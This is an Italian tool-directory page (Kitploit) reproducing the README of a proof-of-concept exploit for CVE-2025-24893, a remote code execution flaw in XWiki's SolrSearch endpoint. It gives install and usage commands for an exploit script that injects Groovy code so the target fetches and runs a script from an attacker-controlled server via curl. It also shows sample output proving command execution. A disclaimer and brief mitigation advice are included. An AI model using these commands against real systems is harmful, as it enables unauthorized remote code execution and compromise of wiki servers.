Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
xwiki-cve-2025-24893-poc — PoC per CVE-2025-24893 | Kitploit
Strumenti/GitHubGitHub/570rmbr3ak3r/xwiki-cve-2025-24893-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneStrumento di Accesso Remoto
GitHub570rmbr3ak3r/xwiki-cve-2025-24893-poc

xwiki-cve-2025-24893-poc

PoC per CVE-2025-24893

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
3141 anno faNon ancora revisionato
Condividi

PoC di Exploit RCE su XWiki (CVE-2025-24893)

Panoramica

Questo repository contiene un Proof of Concept (PoC) per l'exploit della vulnerabilità di Esecuzione Remota di Codice (RCE) su XWiki identificata come CVE-2025-24893. La vulnerabilità permette a un attaccante di eseguire codice arbitrario su un'istanza XWiki target sfruttando una richiesta manipolata all'endpoint SolrSearch. Questo script supporta target HTTP e HTTPS.

⚠️ Dichiarazione di non responsabilità: Questo PoC è inteso esclusivamente a scopo educativo e di ricerca. L'uso non autorizzato di questo codice contro sistemi senza permesso esplicito è illegale e non etico. Ottenere sempre l'autorizzazione appropriata prima di testare qualsiasi sistema.

Dettagli della vulnerabilità

  • ID CVE: CVE-2025-24893
  • Componente interessato: Endpoint SolrSearch di XWiki
  • Impatto: Esecuzione Remota di Codice (RCE)
  • Avviso: Avviso di sicurezza GitHub

La vulnerabilità deriva da una gestione impropria dell'input utente nell'endpoint SolrSearch, consentendo l'iniezione di codice Groovy tramite un payload appositamente creato. Questo PoC dimostra come un attaccante possa sfruttarla per eseguire comandi arbitrari sul server target.

Prerequisiti

  • Python 3.x
  • Librerie Python richieste: requests, , , ,
Scarica lo strumento
argparse
urllib.parse
re
html
  • Un'istanza XWiki target vulnerabile a CVE-2025-24893
  • Un server controllato dall'attaccante per ospitare lo script bash, accessibile via HTTP o HTTPS
  • Un file contenente il codice da eseguire sul target
  • Installazione

    1. Clonare questo repository:
      root@kitploit:~
      git clone https://github.com/570RMBR3AK3R/xwiki-cve-2025-24893-poc.git
      
    2. Installare le librerie Python richieste:
      root@kitploit:~
      pip install requests
      

    Utilizzo

    Lo script invia una richiesta HTTP/HTTPS manipolata all'istanza XWiki target, iniettando un payload Groovy che esegue un comando curl per recuperare ed eseguire un file da un server controllato dall'attaccante.

    Eseguire lo script con il seguente comando:

    root@kitploit:~
    python3 exploit.py --url <url_target> --server <server_attaccante> --file <file_maligno> [--no-verify]
    

    Argomenti

    • --url: L'URL di base dell'istanza XWiki target (es., http://target o https://target).
    • --server: L'IP o hostname del server dell'attaccante, inclusa la porta se necessario (es., 192.168.1.100:8080). Supporta sia HTTP che HTTPS.
    • --file: Il nome del file sul server dell'attaccante contenente il codice da eseguire (es., exploit.sh).
    • --no-verify: Flag opzionale per disabilitare la verifica SSL per target HTTPS (usare con cautela, solo per test).

    Esempio

    root@kitploit:~
    python3 exploit.py --url http(s)://xwiki-vulnerabile.com --server http(s)://192.168.1.100:8080 --file exploit.sh
    

    Per bypassare la verifica SSL (es., per certificati autofirmati):

    root@kitploit:~
    python3 exploit.py --url https://xwiki-vulnerabile.com --server http(s)://192.168.1.100:8080 --file exploit.sh --no-verify
    

    Questo farà:

    1. Costruire un payload che utilizza lo script Groovy per eseguire un comando curl.
    2. Recuperare il file specificato (exploit.sh) dal server dell'attaccante (http(s)://192.168.1.100:8080).
    3. Eseguire il file recuperato sul sistema target.
    4. Estrarre e visualizzare l'output, pulendo eventuali tag HTML ed entità.

    Output

    Lo script estrae la risposta dal target, rimuove i tag HTML (es., <br/>, <del>) e converte le entità HTML in testo semplice per una migliore leggibilità. L'output pulito viene stampato sulla console.

    Esempio

    root@kitploit:~
    python3 exploit.py --url http://<redatto> --server http://<redatto>:8080 --file exploit.sh 
    uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)
    

    Limitazioni

    • L'istanza XWiki target deve essere vulnerabile a CVE-2025-24893.
    • Il server dell'attaccante deve essere accessibile dal sistema target via HTTP o HTTPS.
    • Lo script presuppone che il server target supporti l'endpoint SolrSearch e l'esecuzione di Groovy.

    Mitigazione

    Per proteggersi da questa vulnerabilità:

    • Aggiornare XWiki all'ultima versione corretta.
    • Fare riferimento all'Avviso di sicurezza GitHub per passaggi dettagliati di mitigazione.
    • Blog di riferimento CVE-2025-24893

    Licenza

    Questo progetto è concesso in licenza con la Licenza MIT. Vedere il file LICENSE per i dettagli.